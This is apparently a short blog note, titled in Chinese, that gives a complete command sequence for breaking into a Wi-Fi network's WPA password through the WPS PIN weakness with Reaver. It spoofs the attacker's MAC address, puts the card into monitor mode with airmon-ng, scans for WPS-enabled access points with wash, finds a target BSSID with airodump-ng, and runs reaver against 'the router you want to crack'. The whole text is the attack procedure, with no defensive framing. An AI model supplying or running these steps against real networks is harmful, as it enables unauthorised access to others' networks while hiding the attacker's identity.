Reaver : 利用 WPS 功能從 PIN 獲取 WIFI 密碼

// change to fake mac address

# ifconfig wlan0 down

# ifconfig wlan0 hw ether (fack mac)
or
# macchanger -r wlan0

# ifconfig wlan0 up

// put wireless device into monitor mode

# airmon-ng start wlan0

// find out if the AP you are attacking usese WPS (vulnerable to Reaver)

# wash -i mon0

// find the BSSID of the router you want to crack

# airodump-ng wlan0

// crack the network's WPA password

# reaver -i mon0 -b [bssid] -vv --mac=(fack name)

Reference :
How to Crack a Wi-Fi Network's WPA Password with Reaver
[wireless security]使用reaver顺利通过WPS功能破解WPA/WPA2